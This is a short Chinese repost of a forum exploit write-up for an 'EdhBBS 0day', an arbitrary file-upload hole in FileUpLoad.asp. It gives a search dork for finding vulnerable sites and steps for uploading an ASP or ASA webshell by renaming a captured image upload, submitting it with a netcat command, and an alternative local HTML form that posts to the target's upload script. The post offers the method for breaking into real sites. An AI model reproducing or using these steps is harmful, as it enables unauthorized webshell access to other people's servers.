EdhBBS 0day -电脑资料

时间:2016-04-03 06:42:31
染雾
分享
WORD下载 PDF下载 投诉

----------------------------------------------------

From:www.3est.com

Author:yyxh520

-------------------------------------------------------------

关键字:inurl:EdhBBS

漏洞文件:EdhBBS/FileUpLoad.asp

抓包上传的图片小马

按下图做修改:

把JPG直接改为ASP,不用在后面加空格

最后用nc上传提交就行了

nc www.xxxxx.com 80 <1.txt

成功得到shell???????????

祝大家圣诞快乐(*^__^*) 嘻嘻……

udb311兄弟的提议:

UpLoads/2009-12-24(16-20-49).ASA ``````

本地构造也行哦,

EdhBBS 0day

。不用NC```

代码:

论坛文件上传

Load="window.setTimeout(document.body.style.backgroundColor=parent.PadBgColor;,30);">

action="http://www.XXX.com/EdhBBS/FileUpLoad.asp" target="_self" onSubmit="ExtNameChk()"

style="margin:0;padding:0">

本地另存为1.HTML上传ASA``````搞定```

EdhBBS 0day -电脑资料

手机扫码分享

Top